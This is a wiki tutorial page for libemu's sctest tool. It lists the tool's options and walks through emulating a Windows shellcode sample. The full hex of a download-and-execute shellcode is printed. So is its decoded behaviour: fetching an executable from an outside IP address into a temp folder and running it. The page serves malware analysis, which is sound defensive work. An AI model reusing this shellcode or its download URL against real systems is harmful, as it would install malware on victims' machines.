Libemu/sctest

From aldeid
Jump to: navigation, search
You are here:
sctest

Description

sctest is part of the libemu testsuite and very usefull when testing new features. Even though the code is historically tainted it may be a usefull source for those who want to setup shellcode emulation allowing win32 api calls and offering hooks on these calls. sctest is not the best example, the code is nerved by the logic for graphing the callflow, but for now it has to work.

Usage

-a PATH, --argos-csi=PATH
use this argos csi files as input
-b IP:PORT, --bind=IP:PORT
bind this ip:port
-c IP:PORT, --connect=IP:PORT
redirect connects to this ip:port
-C CMD, --cmd=CMD
command to execute for "cmd" in shellcode (default: cmd="/bin/sh -c \"cd ~/.wine/drive_c/; wine 'c:\windows\system32\cmd_orig.exe' \"")
-d INTEGER, --dump=INTEGER
dump the shellcode (binary) to stdout
-g, --getpc
run getpc mode, try to detect a shellcode
-G FILEPATH, --graph=FILEPATH
save a dot formatted callgraph in filepath
-h, --help
show this help
-i, --interactive
proxy api calls to the host operating system
-l, --listtests
list all tests
-o [INT|HEX], --offset=[INT|HEX]
manual offset for shellcode, accepts int and hexvalues
-p PATH, --profile=PATH
write shellcode profile to this file
-S, --stdin
read shellcode/buffer from stdin, works with -g
-s INTEGER, --steps=INTEGER
max number of steps to run
-t INTEGER, --testnumber=INTEGER
the test to run
-v, --verbose
be verbose, can be used multiple times, f.e. -vv

Example

Let's use libemu sctest to analyze the following shellcode (lines have been wrapped):

$ more shellcode.hex 
\xe8\x00\x00\x00\x00\x5d\x83\xc5\x14\xb9\x8b\x01\x00\x00\xb0\x3d\x30\x45\x00\x45\x49\x75
\xf9\xeb\x00\xad\xad\xad\xad\xad\xad\xad\xad\xd4\xc1\x3d\x3d\x3d\x62\x59\x9c\x0d\x3d\x3d
\x3d\x45\x31\xb6\x7d\x31\xb6\x4d\x21\x90\xb6\x55\x35\xd6\x34\xb6\x7d\x09\xb0\x7d\x41\xb6
\x55\x01\xb6\xca\x57\x39\x64\xd5\xb2\x3d\x3d\x3d\xdf\xc4\x55\x52\x53\x3d\x3d\x55\x48\x4f
\x51\x50\x69\xc2\x2b\xb6\xd5\xd5\x44\x3d\x3d\x3d\xb6\xea\x7a\xbd\x02\x3d\x48\xc7\x7a\x6a
\x7a\xbd\x02\x3d\x48\xc7\xb6\xd2\x62\x0e\xf4\xbc\xd1\x39\x3c\x3d\x3d\xb6\xe1\x6c\x6f\x6e
\x55\x39\x3c\x3d\x3d\xc2\x6b\x31\x67\x64\x6c\x6f\xb6\x3f\x6e\x7e\xbd\x06\x3d\x48\xc7\xbc
\x46\xc1\x13\x58\x45\x58\x48\x3e\xbe\xd6\x35\xb4\x3e\xfa\x7e\x39\x13\x58\x45\x58\xfb\x7e
\x35\x3d\x66\xb7\xfc\x39\x0d\xb5\x78\x3d\x0e\xfd\x6d\x6d\x6e\x6a\x6d\xc2\x6b\x2d\xbe\xc5
\x3d\x48\x3b\x57\x3c\x6e\xc2\x6b\x39\x67\x64\xbe\xff\x39\x7c\xbd\x07\x3d\x48\x89\xc2\x6b
\x35\x6c\x6b\xb6\x48\x01\xb6\x49\x13\x45\x3e\xc8\x6b\xb6\x4b\x1d\x3e\xc8\x0e\xf4\x74\x7c
\x90\x3e\xf8\x0e\xe6\x32\x83\x2d\x07\xeb\x49\x35\xfc\xf6\x30\x3e\xe7\x7d\xd6\xcc\x06\x22
\x48\xda\x63\xb6\x63\x19\x3e\xe0\x5b\xb6\x31\x76\xb6\x63\x21\x3e\xe0\xb6\x39\xb6\x3e\xf8
\x96\x63\x64\xfe\xd5\xc2\xc3\xc2\xc2\xb3\x73\x33\xd1\xa5\xc3\xb7\x33\x43\xe5\xdf\x4e\x0e
\xf7\xb7\x66\x0b\x27\x12\x4d\x4a\x77\x6c\x4e\x3d\x55\x49\x49\x4d\x07\x12\x12\x04\x09\x13
\x0f\x09\x0a\x13\x0f\x13\x0c\x08\x0a\x12\x13\x51\x5e\x56\x12\x02\x55\x00\x08\x5c\x5e\x3d
\x54\x02\x05\x04\x0f\x5f\x59\x09\x0b\x58\x0d\x0c\x0d\x0d\x5b\x0d\x0a\x0d\x0d\x0f\x59\x5c
\x0b\x0e\x04\x5c\x04\x5c\x0d\x0b\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0f\x5e\x0c\x08\x0d
\x0e\x0c\x04\x0e\x0d\x0d\x0d\x0c\x0d\x09\x0d\x04\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0c\x0a
\x0d\x3d

We will use following alias to convert this shellcode to raw binary:

$ grep hex2raw ~/.bash_aliases 
alias hex2raw="tr -d '\\\x' | xxd -r -p"
$ cat shellcode.hex | hex2raw > shellcode.raw 

Now, let's use sctest:

$ cat shellcode.raw | sctest -Svs 10000000 > sctest-out.txt 

Here is the output:

Code excerpt Explanation
$ more sctest-out.txt 
verbose = 1
Hook me Captain Cook!
userhooks.c:108 user_hook_ExitProcess
ExitProcess(1952201315)
stepcount 295460
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00416fc6 => 
           = "urlmon";
) = 0x7df20000;
Call LoadLibrary to load urlmon.dll, required later to invoke URLDownloadToFile
DWORD GetTempPathA (
     DWORD nBufferLength = 260;
     LPTSTR lpBuffer = 0x00416ec2 => 
           = "c:\tmp\";
) =  7;
Call GetTempPathA to determine the path where the downloaded file will be saved
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 => 
         none;
     LPCTSTR szURL = 0x00417140 => 
           = "http://94.247.2.157/.lck/?h=5ac0i?892bd46e0100f07002da
             639a9a060000000002c15031930001040900000000170";
     LPCTSTR szFileName = 0x00416ec2 => 
           = "c:\tmp\wJQs.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
Call URLDownloadToFile to download and save a file from the remote URL
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x00416ec2 => 
           = "c:\tmp\wJQs.exe";
     UINT uCmdShow = 1;
) =  32;
Call WinExec to execute the downlaoded file
void ExitProcess (
     UINT uExitCode = 1952201315;
) =  0;
Call ExitProcess to exit the process that has downloaded the file

Comments

blog comments powered by Disqus